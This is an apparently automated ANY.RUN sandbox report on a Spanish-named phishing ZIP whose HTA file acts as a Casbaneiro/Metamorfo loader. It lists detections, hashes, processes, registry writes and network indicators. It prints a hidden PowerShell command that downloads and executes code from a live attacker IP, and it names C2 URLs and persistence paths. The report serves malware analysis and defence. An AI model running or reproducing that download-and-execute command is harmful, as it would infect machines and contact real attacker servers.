File name:

Adjuntos04-Junio.PDF-TJBNKHP.zip

Full analysis: https://app.any.run/tasks/b759071e-9cbf-40c8-ad68-876e28b5850b
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: June 04, 2024, 20:25:36
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
casbaneiro
metamorfo
uac
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

82003AA5C6D6E08678709848218B85B2

SHA1:

A03407FBFCE6CBB7052C14311C53252F13A53AB0

SHA256:

12DF42601CCD2DF232BF3667E1E12F8B11D79F55D9787AE9A824694A4ECE4AF2

SSDEEP:

12:5jn4K3HxatsaS09HpljpBCgAhL9cG1LTB56LgNe4HjIDEBTkBHXGNennbMAcnFkG:9nH3HIWC3ADTB5NNeKTgGinEnFkUm0

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1424)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 1424)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2260)
      • powershell.exe (PID: 2252)
    • Modifies registry (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2252)
    • Request from PowerShell that ran from MSHTA.EXE

      • powershell.exe (PID: 1424)
    • Create files in the Startup directory

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
    • Bypass User Account Control (Modify registry)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
    • Connects to the CnC server

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
    • CASBANEIRO has been detected (SURICATA)

      • powershell.exe (PID: 1424)
    • Changes powershell execution policy (Bypass)

      • mshta.exe (PID: 1756)
    • Drops the executable file immediately after the start

      • powershell.exe (PID: 2208)
  • SUSPICIOUS

    • Reads the Internet Settings

      • rundll32.exe (PID: 4072)
      • mshta.exe (PID: 1756)
      • powershell.exe (PID: 1424)
      • sipnotify.exe (PID: 2044)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)
      • sipnotify.exe (PID: 1888)
      • powershell.exe (PID: 2260)
      • powershell.exe (PID: 2252)
    • Probably download files using WebClient

      • mshta.exe (PID: 1756)
    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2252)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2260)
      • powershell.exe (PID: 2252)
    • Connects to the server without a host name

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
    • Changes default file association

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
    • The process executes via Task Scheduler

      • ctfmon.exe (PID: 1692)
      • sipnotify.exe (PID: 2044)
      • sipnotify.exe (PID: 1888)
      • ctfmon.exe (PID: 1596)
    • Contacting a server suspected of hosting a CnC

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
    • The system shut down or reboot

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
    • Likely accesses (executes) a file from the Public directory

      • cmd.exe (PID: 2156)
      • cmd.exe (PID: 2412)
      • cmd.exe (PID: 2120)
      • cmd.exe (PID: 2180)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2156)
      • cmd.exe (PID: 2412)
      • cmd.exe (PID: 2120)
      • cmd.exe (PID: 2180)
    • Application launched itself

      • cmd.exe (PID: 2156)
      • cmd.exe (PID: 2412)
      • cmd.exe (PID: 2120)
      • cmd.exe (PID: 2180)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 2156)
      • cmd.exe (PID: 2412)
      • mshta.exe (PID: 1756)
      • cmd.exe (PID: 2120)
      • cmd.exe (PID: 2180)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 2156)
      • cmd.exe (PID: 2412)
      • cmd.exe (PID: 2180)
      • cmd.exe (PID: 2120)
    • Reads settings of System Certificates

      • sipnotify.exe (PID: 2044)
      • sipnotify.exe (PID: 1888)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2260)
    • Found IP address in command line

      • powershell.exe (PID: 1424)
    • Possibly malicious use of IEX has been detected

      • mshta.exe (PID: 1756)
    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 2208)
    • Runs shell command (SCRIPT)

      • mshta.exe (PID: 1756)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2208)
    • Process drops legitimate windows executable

      • powershell.exe (PID: 2208)
    • The process drops C-runtime libraries

      • powershell.exe (PID: 2208)
  • INFO

    • Manual execution by a user

      • rundll32.exe (PID: 4072)
      • wmpnscfg.exe (PID: 1932)
      • notepad.exe (PID: 124)
      • notepad.exe (PID: 1872)
      • notepad.exe (PID: 2040)
      • mshta.exe (PID: 1756)
      • IMEKLMG.EXE (PID: 2128)
      • IMEKLMG.EXE (PID: 2136)
      • cmd.exe (PID: 2156)
      • cmd.exe (PID: 2412)
      • wmpnscfg.exe (PID: 2764)
      • IMEKLMG.EXE (PID: 2104)
      • IMEKLMG.EXE (PID: 2096)
      • cmd.exe (PID: 2180)
      • cmd.exe (PID: 2120)
      • _uhcrtd3_Yi7.exe (PID: 2140)
      • wmpnscfg.exe (PID: 2784)
      • wmpnscfg.exe (PID: 2808)
      • wmpnscfg.exe (PID: 2736)
    • Reads security settings of Internet Explorer

      • rundll32.exe (PID: 4072)
      • sipnotify.exe (PID: 2044)
      • sipnotify.exe (PID: 1888)
    • Checks supported languages

      • wmpnscfg.exe (PID: 1932)
      • IMEKLMG.EXE (PID: 2128)
      • IMEKLMG.EXE (PID: 2136)
      • wmpnscfg.exe (PID: 2764)
      • IMEKLMG.EXE (PID: 2096)
      • IMEKLMG.EXE (PID: 2104)
      • _uhcrtd3_Yi7.exe (PID: 2140)
      • wmpnscfg.exe (PID: 2784)
      • wmpnscfg.exe (PID: 2808)
      • wmpnscfg.exe (PID: 2736)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 1756)
    • Disables trace logs

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2260)
      • powershell.exe (PID: 2252)
    • Reads the computer name

      • wmpnscfg.exe (PID: 1932)
      • IMEKLMG.EXE (PID: 2128)
      • IMEKLMG.EXE (PID: 2136)
      • wmpnscfg.exe (PID: 2764)
      • wmpnscfg.exe (PID: 2736)
      • IMEKLMG.EXE (PID: 2104)
      • IMEKLMG.EXE (PID: 2096)
      • _uhcrtd3_Yi7.exe (PID: 2140)
      • wmpnscfg.exe (PID: 2784)
      • wmpnscfg.exe (PID: 2808)
    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2252)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2260)
      • powershell.exe (PID: 2252)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2260)
      • powershell.exe (PID: 2252)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)
    • Gets or sets the time when the file was last written to (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)
    • Process checks whether UAC notifications are on

      • IMEKLMG.EXE (PID: 2128)
      • IMEKLMG.EXE (PID: 2136)
      • IMEKLMG.EXE (PID: 2104)
      • IMEKLMG.EXE (PID: 2096)
    • Reads the software policy settings

      • sipnotify.exe (PID: 2044)
      • sipnotify.exe (PID: 1888)
    • Checks proxy server information

      • mshta.exe (PID: 1756)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0002
ZipCompression: Deflated
ZipModifyDate: 2024:06:04 17:36:52
ZipCRC: 0x85adba13
ZipCompressedSize: 520
ZipUncompressedSize: 1120
ZipFileName: Adjuntos04-Junio.PDF-TJBNKHP.hta
No data.
All screenshots are available in the full report
Total processes
172
Monitored processes
36
Malicious processes
9
Suspicious processes
3

Behavior graph

start winrar.exe no specs rundll32.exe no specs notepad.exe no specs notepad.exe no specs notepad.exe no specs notepad.exe no specs mshta.exe #CASBANEIRO powershell.exe wmpnscfg.exe no specs shutdown.exe no specs ctfmon.exe no specs sipnotify.exe imeklmg.exe no specs imeklmg.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe cmd.exe no specs cmd.exe no specs powershell.exe wmpnscfg.exe no specs wmpnscfg.exe no specs shutdown.exe no specs ctfmon.exe no specs sipnotify.exe imeklmg.exe no specs imeklmg.exe no specs cmd.exe no specs _uhcrtd3_yi7.exe cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe powershell.exe wmpnscfg.exe no specs wmpnscfg.exe no specs

Process information

PID: 124
CMD: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\Adjuntos04-Junio.PDF-TJBNKHP.hta
Path: C:\Windows\System32\notepad.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
PID: 1200
CMD: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\Adjuntos04-Junio.PDF-TJBNKHP.hta
Path: C:\Windows\System32\notepad.exe
Parent process: rundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
PID: 1212
CMD: "C:\Windows\system32\shutdown.exe" /r /t 15
Path: C:\Windows\System32\shutdown.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Shutdown and Annotation Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\shutdown.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\secur32.dll
PID: 1424
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex (new-object net.webclient).downloadstring('http://94.131.117.72/ldvb/pw')"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 1596
CMD: C:\Windows\System32\ctfmon.exe
Path: C:\Windows\System32\ctfmon.exe
Parent process: taskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CTF Loader
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ctfmon.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msctfmonitor.dll
c:\windows\system32\msctf.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
PID: 1692
CMD: C:\Windows\System32\ctfmon.exe
Path: C:\Windows\System32\ctfmon.exe
Parent process: taskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CTF Loader
Exit code:
1073807364
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ctfmon.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msctfmonitor.dll
c:\windows\system32\msctf.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
PID: 1756
CMD: "C:\Windows\System32\mshta.exe" "C:\Users\admin\Desktop\Adjuntos04-Junio.PDF-TJBNKHP.hta"
Path: C:\Windows\System32\mshta.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
PID: 1872
CMD: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\Adjuntos04-Junio.PDF-TJBNKHP.hta
Path: C:\Windows\System32\notepad.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
PID: 1888
CMD: C:\Windows\system32\sipnotify.exe -LogonOrUnlock
Path: C:\Windows\System32\sipnotify.exe
Parent process: taskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
sipnotify
Exit code:
0
Version:
6.1.7602.20480 (win7sp1_ldr_escrow.191010-1716)
Modules
Images
c:\windows\system32\sipnotify.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID: 1932
CMD: "C:\Program Files\Windows Media Player\wmpnscfg.exe"
Path: C:\Program Files\Windows Media Player\wmpnscfg.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service Configuration Application
Exit code:
0
Version:
12.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
Total events
43 806
Read events
43 482
Write events
287
Delete events
37

Modification events

Process: (3968) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation: write
Name: ShellExtBMP
Value:

Process: (3968) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation: write
Name: ShellExtIcon
Value:

Process: (3968) WinRAR.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation: write
Name: LanguageList
Value: en-US

Process: (3968) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 3
Value: C:\Users\admin\Desktop\phacker.zip

Process: (3968) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 2
Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip

Process: (3968) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 1
Value: C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip

Process: (3968) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 0
Value: C:\Users\admin\AppData\Local\Temp\Adjuntos04-Junio.PDF-TJBNKHP.zip

Process: (3968) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: name
Value: 120

Process: (3968) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: size
Value: 80

Process: (3968) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: type
Value: 120
Executable files
6
Suspicious files
24
Text files
24
Unknown types
3

Dropped files

PID: 3968
Process: WinRAR.exe
Filename: C:\Users\admin\AppData\Local\Temp\Rar$DRa3968.10349\Adjuntos04-Junio.PDF-TJBNKHP.hta
Type: html
MD5: 8A309B30AEB277EB7A2363484EBE804C
SHA256: C4068F41C6301757FE23051F7B4B4312FB0CFBA3BC618725297CAC803875AD78

PID: 1424
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Type: binary
MD5: 7B9FC8EDA8DFC3E128623081DB20030C
SHA256: 81FB596D7C5C7C9264E891A660D7B00455DD9AC326B9B53816B1F2FE38F4FAED

PID: 1756
Process: mshta.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\0105[1]
Type: text
MD5: 191CE61AB2D4FFCFBAF5F83A0CA1F1CD
SHA256: 606B26B3F230260B7665605B6B2941FC92CDAB086DD2C7E38C655F0A8E976DD4

PID: 1424
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF114f46.TMP
Type: binary
MD5: 0268C3470C936E6FBAC2945B9E1C2099
SHA256: DF2AF58E8879B48826D8A418ED3B02CC8D484BCFC231C5B7A11BD153ED3998E9

PID: 3968
Process: WinRAR.exe
Filename: C:\Users\admin\AppData\Local\Temp\Rar$DRa3968.11125\Adjuntos04-Junio.PDF-TJBNKHP.hta
Type: html
MD5: 8A309B30AEB277EB7A2363484EBE804C
SHA256: C4068F41C6301757FE23051F7B4B4312FB0CFBA3BC618725297CAC803875AD78

PID: 1424
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\V1WWS18NNFDQ95WJHPEB.temp
Type: binary
MD5: 7B9FC8EDA8DFC3E128623081DB20030C
SHA256: 81FB596D7C5C7C9264E891A660D7B00455DD9AC326B9B53816B1F2FE38F4FAED

PID: 1424
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\k0swbrno.ng0.ps1
Type: binary
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256:

PID: 3968
Process: WinRAR.exe
Filename: C:\Users\admin\AppData\Local\Temp\Rar$DRa3968.5925\Adjuntos04-Junio.PDF-TJBNKHP.hta
Type: html
MD5: 8A309B30AEB277EB7A2363484EBE804C
SHA256: C4068F41C6301757FE23051F7B4B4312FB0CFBA3BC618725297CAC803875AD78

PID: 1424
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_dcpgky3_HAA.lnk
Type: lnk
MD5: E8C4A48495A8741F4C4D3CA77AA9E812
SHA256: 3E80267167AA0CBC78125BF5F01DD56712A4F839B01E9DBB213D177D6A0596BC

PID: 1424
Process: powershell.exe
Filename: C:\users\public\USER-PC_dcpgky3_H.cmd
Type: text
MD5: 9FA1754C03684ADD2F1317071460E448
SHA256: 64C97EB830AC01D67F7C732EF35601DBA32CA831909FB0456CC7FCADD2C9C69F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
38
DNS requests
12
Threats
14

HTTP requests

Method: GET
HTTP Code: 200
IP: 94.131.117.72:80
URL: http://94.131.117.72/ldvb/0105
CN: unknown
Reputation: unknown

PID: 1424
Process: powershell.exe
Method: POST
HTTP Code: 200
IP: 94.131.117.72:80
URL: http://94.131.117.72/ldht/index.php
CN: unknown
Reputation: unknown

PID: 1424
Process: powershell.exe
Method: GET
HTTP Code: 200
IP: 94.131.117.72:80
URL: http://94.131.117.72/ldvb/pw
CN: unknown
Reputation: unknown

PID: 2208
Process: powershell.exe
Method: POST
HTTP Code: 200
IP: 86.38.217.167:80
URL: http://86.38.217.167/ps1/index.php
CN: unknown
Reputation: unknown

PID: 2044
Process: sipnotify.exe
Method: HEAD
HTTP Code: 200
IP: 88.221.61.151:80
URL: http://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE2JgkA?v=133620100584530000
CN: unknown
Reputation: unknown

PID: 1392
Process: svchost.exe
Method: GET
HTTP Code: 200
IP: 23.48.23.156:80
URL: http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
CN: unknown
Reputation: unknown

PID: 1392
Process: svchost.exe
Method: GET
HTTP Code: 200
IP: 88.221.169.152:80
URL: http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
CN: unknown
Reputation: unknown

PID: 2044
Process: sipnotify.exe
Method: HEAD
HTTP Code: 200
IP: 88.221.61.151:80
URL: http://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE2JgkA?v=133620101195930000
CN: unknown
Reputation: unknown

PID: 1392
Process: svchost.exe
Method: GET
HTTP Code: 304
IP: 217.20.57.18:80
URL: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?59c6d662c26e01b9
CN: unknown
Reputation: unknown

PID: 1072
Process: svchost.exe
Method: GET
HTTP Code: 304
IP: 217.20.57.18:80
URL: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?90423d3b50428e59
CN: unknown
Reputation: unknown

Connections

PID: 4
Process: System
IP: 192.168.100.255:137
Reputation: whitelisted

PID: 4
Process: System
IP: 192.168.100.255:138
Reputation: whitelisted

PID: 1088
Process: svchost.exe
IP: 224.0.0.252:5355
Reputation: unknown

PID: 1756
Process: mshta.exe
IP: 94.131.117.72:80
ASN: ZAYO-6461
CN: US
Reputation: unknown

PID: 1424
Process: powershell.exe
IP: 94.131.117.72:80
ASN: ZAYO-6461
CN: US
Reputation: unknown

PID: 1100
Process: svchost.exe
IP: 224.0.0.252:5355
Reputation: unknown

PID: 1460
Process: svchost.exe
IP: 239.255.255.250:3702
Reputation: unknown

PID: 2044
Process: sipnotify.exe
IP: 88.221.61.151:80
Domain: query.prod.cms.rt.microsoft.com
ASN: AKAMAI-AS
CN: DE
Reputation: unknown

PID: 2208
Process: powershell.exe
IP: 93.127.200.211:443
Domain: fsnat.shop
ASN: diva-e Datacenters GmbH
CN: DE
Reputation: unknown

PID: 2448
Process: powershell.exe
IP: 93.127.200.211:443
Domain: fsnat.shop
ASN: diva-e Datacenters GmbH
CN: DE
Reputation: unknown

DNS requests

Domain
IP
Reputation
query.prod.cms.rt.microsoft.com
  • 88.221.61.151
whitelisted
fsnat.shop
  • 93.127.200.211
unknown
firebasestorage.googleapis.com
  • 142.250.181.234
  • 216.58.206.42
  • 172.217.16.138
  • 142.250.186.106
  • 142.250.185.202
  • 172.217.16.202
  • 142.250.184.234
  • 142.250.74.202
  • 142.250.185.234
  • 142.250.184.202
  • 142.250.186.74
  • 142.250.186.42
  • 172.217.18.10
  • 142.250.186.170
  • 216.58.206.74
  • 142.250.185.170
whitelisted
config.messenger.msn.com
  • 64.4.26.155
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
ctldl.windowsupdate.com
  • 217.20.57.18
  • 217.20.57.34
whitelisted
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 88.221.169.152
whitelisted

Threats

PID
Process
Class
Message
1424
powershell.exe
Potentially Bad Traffic
SUSPICIOUS [ANY.RUN] Get-WmiObject Cmdlet was detected
1424
powershell.exe
A Network Trojan was detected
LOADER [ANY.RUN] Casbaneiro Server Response (Metamorfo)
1424
powershell.exe
A suspicious string was detected
SUSPICIOUS [ANY.RUN] Decoding FromBase64 HTTP URI String
1424
powershell.exe
A Network Trojan was detected
ET MALWARE Horabot Payload Inbound
2208
powershell.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to connect to TLS FireBase Storage
1756
mshta.exe
A Network Trojan was detected
SUSPICIOUS [ANY.RUN] VBS is used to run Shell
1756
mshta.exe
Potentially Bad Traffic
ET HUNTING PowerShell DownloadString Command Common In Powershell Stagers
7 ETPRO signatures available at the full report
No debug info